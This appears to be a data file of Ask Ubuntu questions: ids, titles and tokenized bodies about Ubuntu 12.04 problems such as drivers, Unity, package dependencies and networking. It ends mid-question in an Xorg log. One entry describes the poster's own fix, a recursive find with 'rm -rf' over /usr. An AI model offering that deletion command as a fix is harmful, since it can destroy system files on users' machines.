130956	how to enable packages from older ubuntu releases ?	there 's a time i 'm wanting to enable msn with empathy ( as you can see on my other question did empathy lose support to windows live in 12.04 ? ) but i always get problems with dependencies while installing packages . for instance , i want to install the package telepathy-haze , but it depends on the package libpurple0 . ok , but when i try to sudo apt-get install libpurple0 it says i got unmet dependencies : it depends upon libgstfarsight0.10-0 ( > = 0.0.3 ) , libperl5.12 ( > = 5.12.4 ) , and perlapi-5.12.4 , all of them can not be installed . when i search for these packages at http : //packages.ubuntu.com , i can only find them as oneiric packages , not as precise . how can i install packages from older releases , such as oneiric , and solve this kind of problem ?
130959	ubuntu 12.04 update + virtualbox vm 4.1.14 r77440 - no input	i can only enter my password with the keyboard and this is what i see after i login if i try to switch to a terminal with ctrlalt+f1 i get this i do n't have a clue how to fix this , or if it 's even possible to fix this without access to a terminal . the recovery console does not work either . it opens , but keyboard input does n't seem to be working for it either . anybody had this happened ? update ( next day ) keyboard input lets me do alt+f2 and invoke a terminal , but i ca n't change focus to the terminal window that opens . any tip on how to switch focus ( alt+tab wont work ) to the terminal window . maybe looking at this you might have a clue what 's going on , maybe there 's no window manager loading ?
130960	completely uninstall ocaml	i want to completely uninstall ocaml so that i can jane street 's open bundle . using sudo apt-get remove ocaml seemed successful but ocaml is still present on my system ( i can run the toploop , etc . ) how can i remove it completely ? apt-file show ../../../usr/bin/ocaml does n't return anything . solved : i used find . -rexexp '.*ocaml [ ^/ ] */ ? -exec rm -rf { } \ ; in the usr directory to remove all ocaml-related files .
130966	wireless connects , but no internet access	i have a new instalation on a new dell laptop ( i7 8gb ram ) . i find my network and successfully connect to it , but then when i open a browser , it acts like i do n't have an internet connection . please help .
130968	use network scanner ( from hp multifunction ) in kubuntu ?	in ubuntu and mint i used xsane to connect to my networked ( wired ethernet ) hp l7680 multifunction printer/scanner . the default scanning app skanlite in kubuntu 12.04 wo n't find my device . i like xsane and i am considering installing it , but it will bring in gimp and 62.9 mb of additional stuff . can anyone recommend the best way to scan stuff from my networked hp l7680 in kubuntu 12.04 ?
130969	can i look at the upgrade log after a distribution upgrade ?	i 've upgraded to ubuntu 12.04 and did it offline using the alternative cd . i did n't look at the `` packages to remove '' section before clicking next - i 've done ubuntu upgrades many times and assumed it was just the normal set of obsolete library packages etc . but i do tend to watch the terminal text go by and see what it 's doing , and i saw it removing a number of packages i wanted . i guess these are packages that are n't on the cd that ca n't co-exist with the new ubuntu . anyway , i want to find which packages have been removed . so does the update log get saved somewhere ? then i can start doing some grepping on it and then reinstall the packages i did want .
130970	google-earth will not launch	after installing ubuntu 12.04lts 64bit i am unable to launch google earth . when i try to launch in terminal i get the following : pst007x @ pst007x-serval-professional : ~ $ cd /opt/google/earth/free pst007x @ pst007x-serval-professional : /opt/google/earth/free $ ./googleearth.bin bash : ./googleearth.bin : no such file or directory pst007x @ pst007x-serval-professional : /opt/google/earth/free $ if i use nautilus and navigate to `` /opt/google/earth/free '' `` googleearth.bin '' is there . additional : tried creating a new profile and deleting my old profile , purging my system of googleearth , used janiter to remove all other references too , re-installed from fresh download , but same issue.. so how is it possible that a successful installation , with all the dependencies installed , and the googleearth.bin file there , confirmed , but will not launch , with the error `` bash : ./googleearth.bin : no such file or directory ''
130977	why is the purchase section in software center empty ?	the `` for purchase '' section in the usc is empty . why ?
130979	how to edit chromium code to hide/remove address bar ?	i have built chromium based on chromium.org . now i need to modify the ui . i need to hide ( remove ) the address bar and also i need to disable the right click option . could you please suggest ( explain ) which file i need to edit in-order to do this tasks .
130982	why blender has no cycles render built in ?	there is no cycles render in blender . and there is no opencl and cuda acceleration support . please improve this and update the repositary ( blender 2.63 )
130987	is there any user-friendly nurbs modelling software	i can`t find nurbs software like rhino 3d ( or moment of inspiration ) with : - ubuntu support - user friendly interface - iges , step , 3dm import-export
130995	how can i learn ethernet device buffer size on ubuntu 11.10	i wonder if i can learn ethernet buffer size.almost all of us visit youtube or other video sites and if our connection limit is lower ( i live in turkey and fast internet is really ) so when i want to watch a video i start video and then pause.but what is that 's limit ? i know that that video is streaming to my ethernet card 's cache therefore i use ifconfig command and it could not help me after that i installed system profiler and benchmarker gui program and i could not understand that 's network result.finally can i learn cache size , if so how can it be ?
130998	how do i add eclipse to the launcher ?	i 'm using the following eclipse.desktop file [ 1 ] on the unity dock but i keep seeing the following error [ 2 ] in the `` .xsession-errors '' file everytime i click the eclipse icon . are there any ideas why this is happening ? [ 1 ] [ desktop entry ] encoding=utf-8 name=eclipse comment=java ide exec=/bin/sh /home/username/eclipse/eclipse icon=/home/username/eclipse/icon.png categories=application ; development ; java ; ide version=1.0 type=application terminal=0 [ 2 ] /home/username/eclipse/eclipse : 5 : /home/username/eclipse/eclipse : syntax error : `` ( `` unexpected
131003	rhythmbox and metadata	i was wondering whether there is way to make rhythmbox fetch or find metadata automatically online for all the songs in my library . is such a task possible ?
131012	ubuntu logs automatically into unity-2d mode	recently i upgraded to ubuntu 12.04 . the computer is an acer aspire 5732z and i have 2 problems : when i log onto ubuntu ( in 3d mode ) it begins in 2d mode . i can not change the screen resolution . since installing it at first , the screen appeared black , causing problems , but i solved it with the `` nomodeset '' . any help is appreciated .
131014	12.04 live cd/usb will not boot	on my old dell inspiron 530 ( late 2007 model ) , the ubuntu 12.04 iso will not boot at all . it hangs at the splash screen while it 's scanning for devices ( i know this because i booted it after the first hang without the quiet splash parameters ) . it currently has ubuntu 11.10 on it , running fine , but i prefer clean installs .
131016	how can i remove and re-install unity ?	unity is misbehaving after installing glx dock - hud does not open with glx dock turned off and there are ugly shadows in the panel , three control buttons ( close , minimise , maximise ) and `` ubuntu desktop '' label when there are no apps running . i have to click the top panel to get the super key to open the dash . i have tried unity -- reset and unity -- replace commands , but they do not help . can i un-install and re-install unity ?
131017	ssh into ubuntu vm remotely	i dont have much experience on networking or linux , but i 'm trying to ssh into an ubuntu virtual machine from outside my home network . the ubuntu virtual machine ( virtualbox ) is running an a debian desktop . i did some research and found i had to forward port 22 from the router to the virtual machine . -i changed the network setting on the vm to bridge . -i 'm forwarding the port to the vm . -i checked ( http : //www.yougetsignal.com/ ) to show the port as open . but when i try to connect it is still not working . ssh username @ -- connection refuse is there anything i have to do inside the virtual machine to allow incoming connections ? or forward any port ? is there anything i 'm doing wrong , any help would be greatly appreciated ! !
131018	broken xorg.conf file	if i break the xorg.conf file and i ca n't startup ubuntu 12.04 . how do i revert back to a backup xorg.conf file called xorg.conf.backup ?
131024	holding super key does n't show unity shortcuts	as the title states , when i hold the super key unity shortcuts list does n't appear . i 'm on ubuntu 12.04 ( fresh install ) . i can see the dock that shows up with numbers on icons to launch applications . help .
131029	how can i put quick launchers in the top-panel ?	how can i put quick launchers in the top-panel . there is space for many many useful launchers .
131042	how do i get tsclient back in 12.04 ?	i `` upgraded '' to ubuntu 12.04 over the weekend and am not at all happy . tsclient which i used to use all the time here at work is gone . remmina is terribly unstable and buggy . tsclient was so stable and worked perfectly . does anyone know how to get tsclient installed on 12.04 while i look for another linux distribution ?
131043	audio and video performance issues in 12.04	i 've just upgraded from 11.10 to 12.04 . 11.10 works fine , but in 12.04 it seems that everything is failing . when i play a video or music , sound ( and video ) is ( faltering ? ) , and youtube does not work well . i 've tried lots of programs and installed codecs from medibuntu , but it seems there is a problem with the audio driver or even with kernel . i have hardware acceleration via nvidia proprietary driver , if it is relevant .
131044	how can i input punctuation marks like ellipsis ?	in mac os x there are ways to input punctuation marks by combination of some keystrokes . for example , alt + ; inputs a precomposed ellipsis character ( … , u+2026 ) . alt + [ opens a curly double quote character ( “ , u+201c ) . is there any way to input such punctuation marks in simple combination of keystrokes in ubuntu ? the following is a list of characters i want to use : ‘ ( u+2018 ) : single quote opening ’ ( u+2019 ) : single quote closing “ ( u+201c ) : double quote opening ” ( u+201d ) : double quote closing … ( u+2026 ) : precomposed ellipsis — ( u+2014 ) : em dash – ( u+2013 ) : en dash
131045	how do i uninstall vmware workstation ?	after an update , i can no longer run vmware workstation , it fails to open . trying to install it fails on the virtual network , the patch no longer works . how do i uninstall it completely so i can attempt a fresh reinstall ?
131048	how to install swichable radoen hd 6470m drivers for ubuntu 12.04 lts	i have hp pavilion g6 i5 laptop with radoen hd 6470m switchable vga . i installed it the ubuntu 12.04 lts but vga drivers does n't work properly . i want to install drivers into the ubuntu . but when i do it arrived error massage like this '' sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log '' i dont know what can i do now ! help me . ~ $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati seymour [ radeon hd 6400m series ] [ 1002:6760 ]
131051	how to kill and to start the x server ?	in 12.04 how do you kill the x server from the command line and from the gui interface and how do you start it from the virtual terminal ?
131052	wireless problem after suspending my ubuntu 12.04	i have a problem , once i have resumed from suspend the wireless stops working , and i do n't seem to be able to restart it again .
131053	libreoffice write 3.5.2.2 format ordinal numbers does n't work	does anyone know why in libreoffice 3.5.2.2 the auto formatting of ordinal numbers ( i.e . 1st / 2nd / 3rd etc.. ) is n't working ? i 've checked the settings and it 's ticked as described in the link ... http : //help.libreoffice.org/common/localized_options # format_ordinal_number_suffixes_.281st_ ... _1.5est.29
131055	when will gimp 2.8 come to the software repository ?	i 'm not a novice , i could find a ppa or just compile it but i like to keep my systems tidy . so with that being said , when will gimp 2.8 come to the software repository ? also , rather than just getting the answer is there a place on the ubuntu interwebs some where that i can check the status for other packages as well ? or is this all done internally at canonical ?
131056	problem with input method	in some input boxes i ca n't type . if i right-click on input box i can see input methods , where ibus is selected . if i select `` none '' instead , everything is fine . how can i turn this ibus method off globally ?
131061	can i make the dash forget the previous search each time it opens ?	i would like the search bar to be empty each time , just like how windows vista onwards lets you press super , type a few letters , press enter , and subsequently your desired program/file will pop up ( a few minutes later ) . the beauty is that you do n't have to click or backspace to get rid of your previous search each time . i 'm on 12.04 .
131066	problem installing lmms using dns sound ppa	i would like to install the newest lmms version to date , which is to say lmms 0.4.13 , as mentioned in the launchpad ppa page dns sound ( https : //launchpad.net/~dns/+archive/sound ) , which keeps up to date packages of a lot of awesome music software on linux . as i 'm using several of them , i added the ppa in software sources ; it was successful but , strangly , i ca n't get lmms 0.4.13 in synaptic . i get 'lmms ' version 0.4.10 and 'lmms-common ' 0.4.13 , which causes unresolved dependencies , as : the following packages have unmet dependencies : lmms : depends : lmms-common ( = 0.4.10-2ubuntu1 ) but 0.4.13-stable.git.2225-2~precise1 is to be installed e : unable to correct problems , you have held broken packages . what can i do to fix this ? i 'm using a freshly updated ubuntu , 12.04 .
131067	ooo-thumbnailer does not work in 12.04	i have ubuntu 12.04 and ooo-thumbnailer does not work . i have installed it from the above ppa and restarted nautilus , of course , but no thumbnails whatsoever are created . when i call ooo-thumbnailer from the command line i gen the following : convert convert : improper image header ( /tmp/gmj6jks5 ) . it is something it has to do with the imagemagick convert utility . i have installed the graphics-imagemagick-compat package , but i also tried to substitute that with the imagemagick package . in this case ooo-thumbnailer still does n't work but the error code is different ( i do n't recall precisely now ) . i also tried to compile ooo-thumbnailer and imagemagick from source with no success . anyone knows what the problem might be ? thanks daniele
131071	how to remove libthai-data ?	this seem like bigger problem then expected . i had problem with input dialog boxes problem-with-input-method when i learned that i had some chinese language in language preferences and couple of thai input methods . i started to remove all related data , many thai fonts , additional input methods , and when i selected libthai-data from synaptic , now it wants to remove more then 100 packages , everything i have installed including unity , compiz , nautilus , firefox ... i installed 12.04 on clean formated hard drive on the day it was announced , without selecting anything exotic , like other language then english and similar any suggestions ? also when some dialog in nautilus ( not sure if it 's globally ) pops , then buttons are placed opposite than they should , and then quickly roll to normal position . i assume it 's related to this issue , and also think that there must be some bug report already , as i downloaded iso image from ubuntu site normally , and followed simple installation instruction without tweaking anything .
131075	what is the difference between `` nautilus '' , `` files '' and `` home folder '' ?	when i type `` nau '' in the search bar of the applications-hud the result is a `` home folder '' folder and a `` files '' folder installed but the `` files '' has a home drawing in it and is recently used , whereas the `` files '' does n't and is not recently used . the search result also returns some tools for nautilus but with different icons and i ca n't see any nautilus in the hud . where is this guy nautilus and how is its face ? . this is puzzling ! . i ca n't find nautilus ! . in addition , when i select the folders `` files '' and `` home folder '' i can see no difference between the windows dispalyed for `` home folder '' ( without home ) and the `` files folder '' ( with a home ) , and none of them is the real `` home '' folder where all the users have their files ! ! . i would rather have everything in chinese , ha ha .
131091	unity does not start automatically , have to start it manually	after upgrading to 12.04 the system starts up normally , and shows me the login screen . after i log in , unity does not seem to start up and shows me a small xterm window . i start unity manually from there by typing into the command . the xterm window stays open and if i close it it takes me back to the login screen . the theme also seems to be totally messed up . other than that every thing seems to be working ... i have also reinstalled the ubuntu-desktop package several times , does not seem to help any idea ?
131092	why does unity make it hard to rearange an icon in the launcher ?	i recently installed the latest version of ubuntu , and i noticed that when you try to click on an icon in the launcher , unless you wait for one second or drag the icon to the right , you will not be able to rearrange the icon . what would the purpose of that be ?
131094	dhcp server does n't assign network dns to other hosts on my network	i had a problem with my dhcp but i managed to fix it . now the network starts but i have a problem with dns . clients in the network do n't get any dns from my dhcp . my network works as follow my i connect to wireless device then i share it throw out my ethernet cable . my configuration : /etc/dhcp/dhcpd.conf # /etc/dhcp3/dhcpd.conf option subnet-mask 255.255.255.0 ; default-lease-time 600 ; max-lease-time 7200 ; subnet 192.168.27.0 netmask 255.255.255.0 { range 192.168.27.10 192.168.27.20 ; option broadcast-address 192.168.27.255 ; option routers 192.168.27.1 ; } in /etc/default/dhcp-server i added interfaces= '' eth0 '' in /etc/network/interfaces iface wlan0 inet dhcp wireless-essid default iface eth0 inet static address 192.168.27.1 netmask 255.255.255.0 gateway 192.168.0.100 pre-up /sbin/iptables-restore /etc/network/iptables in /etc/resolv.conf i have two nameservers for dns # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 212.72.23.30 nameserver 62.231.243.249 but my clients in the network do n't get them and even if i give them static ones no internet does work . i followed this the tutorial on this website : https : //help.ubuntu.com/community/easywirelesstowiredconnectionsharing there were some changes i had to change to make it work , i followed so other guide from other websites to make it run . so now network dhcp is working but no dns is working on the clients side . any help will be appreciated .
131099	set terminal title to taskbar ?	when i use vim to edit some file , i have the set title command in my .vimrc . so it changes the title of the terminal . but this changed/new title is not reflected on taskbar . is there any way to do that ? i am using ubuntu 10.10 .
131100	gnome classic transparent panel	nearly 2013 and it 's forced me to find new os ( my current - 10.04 lts ) . testing 12.04 . unfortunately , unity is overly simple . unity launcher is not customizable . i can not even move launcher to bottom . have tried kde , gnome-shell , unity , xfce . stop on gnome fallback . it 's not the same as gnome 2 , but similar . only thing i want - gnome-panel with alpha transparency and transparent ( ! ) window list . tried to edit gnome-panel.css in usr/share/themes/*any_theme*/gtk-3.0/apps/ but no result . compiz transparency is ugly . found perfect theme on deviantart , but for gnome shell . it is the last straw . if i ca n't customize ubuntu as i want , i 'm going to debian : ) can somebody help me with it ? sorry for my english . p.s . or it can be custom background image . but there is the same issue - widgets and window list still use theme backgrounds .
131110	accidentally deleted the contest folder inside /usr/share/backgrounds	i accidentally deleted the contest folder from inside /usr/share/backgrounds and now i 'm stuck with the static wallpaper option . i ca n't even seem to find it inside the trash bin . it happened while i was using nautilus . is there a way to recover that folder ? actually , what i need is the precise.xml file which was inside it . if there is no way to recover that folder , can somebody just please post the script of that precise.xml file ? thanks .
131116	how can i install java from the command line only ?	when i try to download the link directly using wget i get redirected to an error page . how can i download the official jdk from oracle ?
131120	no splash screen after nvidia propietary drivers	after installing nvidia propietary drivers , splash screen shows nothing but a thick bar on top of screen and everything black . it is the same color that splash screen is . enabling nvidia driver messes up splash screen did n't work at all . after applying solution mentioned , now shows completely black screen . i 'm using 12.04 . i set the resolution to 1024x768 which is native and tried other resolutions as well with no results .
131121	is there a way to automatically reorganize desktop icons ?	gnome has `` keep aligned '' , windows `` rearrange automatically '' ; ca n't find it in unity . is it perhaps because we 're not intended to have icons in the desktop ?
131123	how to bring up system settings gui tool using cygwin-x over ssh	i am connecting to my headless ubuntu 12.04 server using ssh and i want to make some changes to system settings . there is no desktop manager running so vnc is not an option for me . i have cygwin-x installed on my windows laptop . is there any way to bring up the system settings gui tool using cygwin-x over ssh ?
131125	ubuntu 12.04 64 bit after-installation help	i installed ubuntu 12/04 64 bit on my desktop using the nomodeset on boot screen . after the cd finished installing it asked me to restart , i hit restart button , my cd pops out so i take it out and close the dvd drive . when my computer restarted on boot screen it got all purple and warped looking and just sits there like that . please help , i think it 's my gfx card but i do n't know what to do to fix this .
131128	ca n't install flightgear after upgrading to ubuntu 12	i upgrade ubuntu to v12 and flightgear quit working . so i uninstalled it and tried the reinstall it but it will not install . this is what happens when i try to install it . `` package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details the following packages have unmet dependencies : flightgear : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed '' i am on 64bit system any help would be greatly appreciated . thank you for your time
131130	how do i blacklist a hardware item before reboot through the wubi win interface ?	specifically i need to blacklist b43 broadcom adapter so my installation will stop crashing , but the accessibility button on the windows portion of the setup does not do what it does from a live cd wubi . ubuntuforums reference
131136	featureless desktop on login	i 'm pretty unfamiliar with linux , and i 've installed ubuntu 12.04 . the install seems to have gone smoothly and everything , but i 'm having troubles when i log in . the computer boots up normally and takes me to the login screen , and once i login it takes me to a featureless desktop . there 's no list of programs on the left and no menu bar on the top . the wallpaper is there , and i get the standard context menu when i right click the background . i can create folders and search through them and run programs , but everything runs really slowly and windows are pinned in the upper left corner . i tried logging into a guest account and after about a minute of a black screen with a cursor , it loaded up the normal desktop screen . programs are running faster , i can move windows around , i 've got my list of programs on the left and my menu bar up top .
131137	network icon disappears from tray	i got 12.04 lts but it happened in 11.10 too . the thing is that the network icon disappears from tray without any warning . i 've noticed it happens when the connection is weak and unstable , but i know it is just a graphical problem because it still works when it manages to reconnect automatically . when it does n't , i ca n't find another way to put it back other than killing the x server or simply rebooting the os . but come on , this is linux , obviously there is a way to solve this . so how i make it not to disappear ever again ? at least , what can i do to make it reappear ( i suppose with a command in terminal ) ?
131139	why did ubuntu stop free shipping of its cds ?	earlier , if we registered on the ubuntu site , we would get a cd shipped freely to our home . why has ubuntu stopped it ?
131140	12.04 very slow in launching applications	i upgraded to 12.04 and now applications are very slow to launch . for example , i open up the update manager and after about 10 seconds the window appears with a solid white background and then i wait for about 50 seconds and nothing happens . then i open a terminal and it appears very fast and the widgets in the update manager also appear . another example i open a terminal and i wait about 20 seconds and the terminal window wo n't appear . so then i open another terminal and the two windows appear but it takes about 10 seconds for the prompt to appear . i was previously running 10.10 on /dev/sda2 with my /home in /dev/sda1 . then i installed 12.04 in /dev/sda3 and after some testing mounted /dev/sda1 to /home . i 've checked my swap ( with 'free ' ) and it exists . any tips would be appreciated . thanks !
131145	what are 'nightly ' builds ?	when referring to the ubuntu releases , i 've come across something called 'nightly ' builds . what do 'nightly ' builds mean ?
131148	why is n't fluendo software showing up in 12.04 for purchase ?	i am currently running ubuntu 12.04 ( 32 bit ) and i have noticed that none of the previous software available for purchase from fluendo is available . does anyone know why ? while trying to find a answer i noticed a similar issue in the ubuntu forums . the response they received from fluendo was that it was a question for canonical and that they would pass it on to them . i have also emailed fluendo at info @ fluendo.com . they responded by saying that this issue is on canonical 's side in the ubuntu software center and that they are working on resolving this as soon as possible . i 've also posed this question in launchpad at : https : //answers.launchpad.net/ubuntu/+source/software-center/+question/196090 .
131149	where else to go for help if not helped at ask ubuntu ?	what other official places can i go for getting help on ubuntu if i do not get the help i wanted on ask ubuntu ?
131150	how do i install the new beta driver for nvidia ?	how do i install the new beta driver for nvidia ? with ubuntu before 12.04 i could do this : 1 ) downloaded it from the site www.nvidia.com 2 ) logout , 3 ) move to tty1 ( ctrl + alt + f1 ) , 4 ) stop lightdm or gdm ( sudo service lightdm stop ) 5 ) remove any nvidia driver ( sudo apt-get remove -- purge nvidia-current nvidia-settings ) 6 ) cd into downloaded folder ( cd ~/downloads/ ) 7 ) run the installer ( sudo ./nvidia-linux-***.run ) but this does n't work anymore , i.e. , after reboot i am presented with a very low graphic resolution ( something about 320 x 400 ) .
131154	which free software license does ubuntu use ?	i would like to know which free software license does ubuntu use for its releases .
131157	get rid of software raid	we are running software raid1 using mdadm on ubuntu 11.04 . what 's the best way to get rid of it keeping the current system ? i want to use hardware raid instead . what i tried to do : -copied the 1disk of software raid using hdclone . configured degraded raid array without the second disk . then copied everything from /dev/md0 onto a spare disk /dev/sdb using dd utility . however the copy was n't accurate so i was not able to boot . i even tried to reinstall grub but it all didnt work . what 's the best way to do this procedure ? thanks
131159	hide window title in gnome-shell using mutter , gdk , wnck or gtk	i 'm after a way to : get list of all application windows currently open , as a gdk or gtk window remove window decorations for selected windows ( maximised in my case ) . i 'd like to do this using mutter , gdk , wnck or gtk ( or gdkx11 , ... ) ( i.e . anything with gobject introspection ) . i 've seen the following question : remove titlebar from maximized terminal window but am struggling with converting it to something that works . ( the language i 'm using is javascript , but this is somewhat irrelevant since it 's all using gobject introspection ) . i 'm currently using gnome 3.2 ( am open to gnome 3.4 solutions though ) . as to 1. , i know i can get all windows with wnck and mutter fairly easily ( e.g . wnck.screen.get_default ( ) .get_windows ( ) ) , but how do i then convert these into g ( t or d ? ) k windows in order to remove decorations ? i can convert a mutter window to a gdk one like so : xwin = gdkx11.x11window.foreign_new_for_display ( gdk.display.get_default ( ) , mutterwindow.get_compositor_private ( ) [ 'x-window ' ] ) ; however , this xwin object does not respond to commands such as xwin.unmaximize ( ) and xwin.maximize ( ) , so i feel that something went wrong in the conversion ! the reason i want to convert the window into gdk or gtk is so i can use gdk 's set_decorations or gtk 's set_hide_titlebar_when_maximized . i have had a look at gdk.screen.get_default ( ) .get_toplevel_windows ( ) and gtk.window.list_toplevels ( ) but these return lists of more windows than i have open , and i am unsure if my actual application windows are in the list and how to match them up . as to 2. , if i first get the active window from within gdk ( since i know it 's a gdk window and it responds properly to events such as unmaximize and maximize , unlike when i use foreign_new_for_display ) and then try to remove decoration as per the previously linked question , the window ( & process ) dies ! i 'm not sure what the error is . const gdk = imports.gi.gdk ; // get current window . it 's a terminal , not null . // for now assume it 's maximized . curwin = gdk.screen.get_default ( ) .get_active_window ( ) ; // decorations do n't seem to updated unless i unmaximize & re-maximize curwin.unmaximize ( ) ; // try remove decorations : window + process dies ! curwin.set_decorations ( 0 ) ; curwin.maximize ( ) ; if i use curwin.set_decorations ( gdk.wmdecoration.border ) ( note : gdk window documentation here ) , the window appears as i wish when the window is unmaximized ( title bar gone ) , but when maximized , space for the title bar is still left , although the text itself is not shown . would anyone be able to give me insight into how to achieve either of my goals ? ( ultimately , automagic titlebar hiding of maximised windows , like maximus for ubuntu 's unity netbook remix ) . i really do wish to use this using gtk/gdk/wnck/mutter/anything with gobject introspection , as opposed to an external app like compiz or modifying the metacity window theme 's xml ( which i know you can do to achieve this ) .
131168	how do i uninstall grub ?	a hard drive that i use only for data storage still has grub from past ubuntu installations . how can i remove grub from it without harming the rest of the drive 's data ? background i occasionally move the data drive between computers with various boot order configurations , so i would like it to be non-bootable in order to avoid having to accommodate it in each computer 's bios settings . when i power on a computer while only the data drive is attached , the following appears : error : no such device : fdf38dd4-9e9d-479d-b830-2a6989958503 . grub rescue > i can confirm from old backups of /etc/fstab that this was the uuid of a root partition that i recently reformatted and which no longer exists . here 's the the data drive 's partition table and raw master boot record . please note that i 'm not interested in workarounds that do n't answer my primary question . i can think of several ways to work around this issue , but it bothers me on principle that i do n't know how to directly resolve it . every installation procedure should have a counterpart uninstallation procedure .
131170	how to get microphone to work on acer aspire one 722	i have an acer aspire 722 , i recently went to use gmail/talk as well as empathy and realized that the microphone does not work . i checked the sound settings , adjusted microphone level , did a mic test but the level indicator showed no bars .
131174	not booting from usb drive	i downloaded 12.04 of ubuntu , and y copied the 718 mb file to my usb kingston drive ( which is 2gb total ) and i tried booting it from setup and it ca n't ! i click booting from usb kingston and it boots windows normally ...
131175	ubuntu on hp xw4100 install fail	going around in circles trying to install 12.04 on a hp xw4100 . install starts gets to copying files then chokes . i suspect something todo with drivers ? google betrays me with nothing helpful . o wise ones please help .
131177	snap to full screen not working ( dual monitors )	i just updated to 12.04 and i have found a highly annoying bug , i am wondernig if there is a work around . the snap feature , where you drag a window to the top of the screen and it will then fill the screen always moves that window the the main display when using any none-native app . what i mean by that , any app besides terminal or the file browser will get moved to the main display . ( so web browswer , my ftp client ) anyone know a fix ? edit : its not just the snap but the full screen button on the top left corner of the window does the same thing . this is highly annoying !
131180	changing short name of user	i 'm making a small ubuntu network , and in client 10.04 i `` logged in '' as the user `` employee1 '' , and changed my name to `` red herring '' but i can not change the shortname for this account . are there terminal commands or something that i need to use to do this ? i ca n't find any gui ways of doing it . thanks , devin
131187	installation has stalled	new installation on desktop has got to 'downloading packages ' but seems to have stalled ; continues to show numbers - e.g . ( 216:58 remaining ) - which constantly change , but progress bar has stopped ; been running for at least 9 hours .
131190	wired ps/2 keyboard and mouse do not work in 12.04 live cd or after fresh 12.04 install - foxconn d270s atom motherboard	my wired ps/2 keyboard and mouse do not work in 12.04 , either in a fresh install or from the live cd . a usb keyboard and mouse will work . the ps/2 keyboard and mouse will work using the same hardware and a fresh 10.04 ubuntu install or a fresh windows 7 install . the motherboard is a foxconn d270s atom based motherboard . this problem is specific to this motherboard and ubuntu 12.04 . so far i 've tried running in the fresh 12.04 install : sudo apt-get install sudo apt-get upgrade sudo apt-get dist-upgrade after the apt-get upgraded the first time , i now get to the point where there are 0 items to be upgraded . rebooted and still no ps/2 keyboard/mouse . i 've also tried adding the following lines to grub at boot time ( the ps/2 keyboard works in grub ) acpi=noirq acpi=off neither setting made any difference . the motherboard is a foxconn d270s atom based motherboard . even more interestingly , 12.04 recognizes the same ps/2 keyboard and mouse on a separate gigabyte am3+ based motherboard . i only have this problem on this particular motherboard with ubuntu 12.04 . any help would be appreciated . i bought this low-power motherboard specifically for the task of running ubuntu 12.04 for the next five years ... update ... i dug out an old ps/2 mouse that does not use a ps/2 to usb adapter but is directly wired for ps/2 . still no ps/2 keyboard or mouse after reboot . again , i only have this problem with this motherboard and 12.04 ubuntu . other motherboards work fine with 12.04 and this motherboard works fine with 10.04 . update 2 ... i installed the 12.04 server version . the text-based installer recognized the keyboard without issue , but after the first boot into the installed os , the ps/2 keyboard would no longer respond . i tried installing gnome on the server install and the ps/2 mouse and keyboard do n't work in gnome either . i opened bug # 995570 for this issue
131199	ubuntu is really slow	i installed ubuntu through out windows . i know it should go a little slow , but it is quite a slow and my chipset makes noise as it where working really hard . windows 7 works fine . my computer is an acer 5742g , i3 , nvida 540m , 4 gb ram . i think there must be a missing driver , but i do n't know how to install them as i am a new user . can some one give me a link to a good video tutorial ?
131207	android sdk ca n't be installed on ubuntu 12.04-64	i am trying to install android sdk on ubuntu 12.04 but the manager goes blank after downloading the first component of the sdk . i followed the installation steps mentioned here and tried to reinstall ubuntu and nothing works . the terminal does n't show any error messages the system monitor shows no network activity during this process . screenshot : can anyone help ? how can i get this to install ?
131215	slow display with intel 855gm after upgrade to 12.04	i just upgraded to 12.04 from 11.10 on my dell inspiron 700m . the display is now much slower than it used to be . for example , when i drag a nautilus window around with my mouse , the motion of the window significantly lags the mouse pointer ( e.g . if i move the window up and down , the pointer and window motion will be almost 180 degrees out of phase ) . from dmesg : [ 0.419302 ] agpgart-intel 0000:00:00.0 : intel 855gm chipset [ 0.419327 ] agpgart-intel 0000:00:00.0 : detected gtt size : 131072k total , 131072k mappable [ 0.420659 ] agpgart-intel 0000:00:00.0 : detected 16384k stolen memory [ 0.424248 ] agpgart-intel 0000:00:00.0 : agp aperture is 128m @ 0xe8000000 and from xorg.0.log : [ 48.909 ] ( ii ) loading extension dri2 [ 48.909 ] ( ii ) loadmodule : `` intel '' [ 48.953 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 48.953 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 48.954 ] compiled for 1.11.3 , module version = 2.17.0 [ 48.954 ] module class : x.org video driver [ 48.954 ] abi class : x.org video driver , version 11.0 [ 48.954 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server [ 48.954 ] ( ++ ) using vt number 7 [ 48.956 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 48.956 ] drmopendevice : node name is /dev/dri/card0 [ 48.956 ] drmopendevice : open result is 9 , ( ok ) [ 48.956 ] drmopenbybusid : searching for busid pci:0000:00:02.0 [ 48.956 ] drmopendevice : node name is /dev/dri/card0 [ 48.956 ] drmopendevice : open result is 9 , ( ok ) [ 48.956 ] drmopenbybusid : drmopenminor returns 9 [ 48.956 ] drmopenbybusid : drmgetbusid reports pci:0000:00:02.0 [ 48.956 ] ( ii ) intel ( 0 ) : creating default 